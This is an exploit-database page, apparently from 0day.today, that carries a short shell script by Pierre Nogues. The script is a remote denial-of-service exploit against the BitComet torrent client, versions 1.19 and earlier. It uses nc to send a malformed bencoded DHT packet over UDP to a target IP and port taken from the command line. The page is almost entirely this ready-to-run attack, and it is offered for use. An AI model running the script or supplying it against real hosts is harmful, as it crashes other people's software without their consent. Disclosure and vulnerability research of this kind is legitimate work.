[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

BitComet <= 1.19 Remote DoS Exploit

Author
Pierre Nogues
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11548
Category
dos / poc
Date add
31-03-2010
Platform
windows
===================================
BitComet <= 1.19 Remote DoS Exploit
===================================

#!/bin/sh
#
# BitComet <= 1.19 Remote DOS Exploit
# Pierre Nogues - http://www.indahax.com/
#
# Description:
#     BitComet is a torrent client
#
#     BitComet doesn't handle malicious DHT packet with an invalid bencoded message.
#
# Affected versions :
#     BitComet <= 1.19
#
# Plateforms :
#     Windows
#
# Usage :
#     ./exploit.sh ip port
 
if [ $# -ne 2 ]; then
     echo "./exploit.sh ip port"
     exit 1
fi
 
nc -u $1 $2 << .
d4294967285:y1:q1:t4:\x001:q4:ping1:ad2:id20:01234567890123456789ee
.



#  0day.today [2024-07-08]  #